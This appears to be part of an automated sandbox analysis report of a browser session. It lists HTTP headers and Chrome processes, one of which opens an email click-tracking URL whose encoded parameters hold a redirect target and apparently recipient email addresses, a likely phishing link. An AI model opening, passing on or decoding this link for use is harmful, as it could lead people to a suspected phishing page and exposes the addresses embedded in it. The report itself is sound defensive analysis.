                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaC5rFL35sdxpledxQUQ7cS9tXO5VtnppZs3Oxc9gAp01ik%2BHPINPuDZ5C10Joruwliks62FHOrfpTvBxqFEdSGnGaUnj9HR9Q3ciS52QQfN%2BfrwOKbenUqltpj1EWTMHDlhI4mj5AepU1eZDnMU%2BeBlthZup0%2FZKikj9jYIkHwxwzv7mynTfFeusBY6q05LsFkihJ4nyIaI"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a85f0d2e4234-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1762&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1057&delivery_rate=1657207&cwnd=171&unsent_bytes=0&cid=0a4ab60370629dde&ts=1129&x=0"
                                                                                                                          2024-12-19 16:09:34 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                          Data Ascii: 11
                                                                                                                          2024-12-19 16:09:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:11:07:46
                                                                                                                          Start date:19/12/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:1
                                                                                                                          Start time:11:07:47
                                                                                                                          Start date:19/12/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1980,i,19504709162345292,12336163837026692061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:11:07:48
                                                                                                                          Start date:19/12/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ=="
                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          No disassembly